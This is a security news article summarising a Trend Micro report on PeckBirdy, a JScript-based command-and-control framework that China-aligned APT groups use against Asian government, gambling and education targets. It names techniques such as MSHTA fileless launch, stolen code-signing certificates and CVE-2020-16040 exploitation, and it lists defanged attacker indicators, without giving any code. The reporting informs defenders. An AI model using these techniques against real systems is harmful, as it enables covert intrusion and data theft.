Stealth in Script: “PeckBirdy” Framework Powers New Wave of China-Aligned Attacks

A sophisticated new cyberweapon has been spotted in the arsenals of China-aligned Advanced Persistent Threat (APT) groups, marking a significant evolution in how state-sponsored actors evade detection. A new report by Trend Micro unveils PeckBirdy, a lightweight, script-based command-and-control (C&C) framework that has been quietly operating since 2023, targeting Asian government entities, the Chinese gambling industry, and educational institutions.

Built entirely on JScript, PeckBirdy leverages the Windows Script Host to execute commands without dropping heavy files that antivirus software might flag.

According to the Trend Micro report, “PeckBirdy is a JScript-based command-and-control (C&C) framework used by China-aligned APT actors since 2023, designed to execute across multiple environments, enabling flexible deployment”.

By injecting code dynamically at runtime, the framework leaves almost no physical footprint. “Detecting malicious JavaScript frameworks remains a significant challenge due to their use of dynamically generated, runtime-injected code and the absence of persistent file artifacts”.

PeckBirdy rarely works alone. The researchers identified two potent modular backdoors deployed alongside it: HOLODONUT and MKDOOR. These modules extend the framework’s reach, allowing attackers to maintain persistent access and exfiltrate sensitive data.

“Two modular backdoors, HOLODONUT and MKDOOR, extend PeckBirdy’s attack capabilities beyond its core functionality”.

Trend Micro’s investigation linked PeckBirdy to at least two specific campaigns, dubbed SHADOW-VOID-044 and SHADOW-EARTH-045.

• SHADOW-VOID-044: This campaign utilized stolen code-signing certificates and standard Cobalt Strike payloads to breach targets. It notably exploited the CVE-2020-16040 vulnerability, hosting malicious infrastructure across multiple domains to stay resilient against takedowns.
• SHADOW-EARTH-045: In July 2024, this campaign struck a Philippine educational institution. The attackers executed an MSHTA command—a classic fileless technique—to connect to github[.]githubassets[.]net and launch PeckBirdy on a compromised IIS server.

The researchers found tentative links between these attacks and known groups like Earth Lusca and Earth Baxia, though definitive attribution remains complex. For instance, an IP address used in the Philippine attack (47[.]238[.]184[.]9) had previously been linked to Earth Baxia operations.

Related Posts:

• Microsoft Windows JScript component exists Remote Code Execution Vulnerability
• Windows 11 24H2 Standardizes Scripting: JScript9Legacy Engine Now Default for Enhanced Security
• China-Aligned APTs Intensify Cyber Espionage on Taiwan’s Semiconductor Industry
• Mustang Panda Backdoor Exposed: New ToneShell Malware Masquerades as Chrome to Spy on Gov’t & Military
• China-Aligned Hackers Unleash Upgraded Toneshell and New USB Worm